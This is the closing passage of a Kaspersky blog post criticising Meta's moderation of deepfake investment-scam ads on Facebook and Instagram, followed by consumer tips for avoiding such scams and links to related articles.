In short, Meta’s efforts to fight deepfakes and investment scams on its platforms remain inadequate. Even with its plentiful resources and AI-powered tools, the company is unable to quickly detect and block obviously fake videos that exploit the likeness of public figures.

These ads appear daily in users’ feeds as paid promotions from fake yet seemingly legitimate accounts. This means that Facebook and Instagram ultimately profit from their being spread.

How to avoid falling victim to deepfake ads on Instagram and Facebook

To avoid suffering from questionable and outright fraudulent investment advice, our primary recommendation is not to make financial decisions based on information from Instagram or Facebook. In addition to that:

• Approach ads on social media with caution. As the stories in this post clearly show, ad moderation on Facebook and Instagram (and X, too) is less than ideal.
• Don’t forget about deepfakes. For several years now, we’ve been living in a reality where videos of any famous person can be easily, quickly, and cheaply faked. You should keep this in mind and verify any information you receive from dubious sources.
• Remember the universal rule of investing: the higher the potential return, the greater the risk involved. Therefore, you shouldn’t invest money you aren’t prepared to lose in schemes with supposedly high profits (which actually have a high risk).
• Be especially careful with offers that promise quick profits with minimal outlay. This is one of the most obvious signs of a scam — you know what they say about free lunch.
• Use only reliable investment apps from vetted brokers downloaded from official app stores. You shouldn’t trust download links sent by strangers in messaging apps.
• Tell your family and friends about deepfake video scams. This will help protect them from losing money and the emotional distress that can follow.

Learn more about deepfakes:

• Watch the (verified) birdie, or new ways to recognize fakes
• Don’t believe your ears: voice deepfakes
• You’re in for a big payout again
• How to mitigate the impact of deepfakes
• Scams targeting lovers or the lovelorn

Kaspersky official blog – ​Read More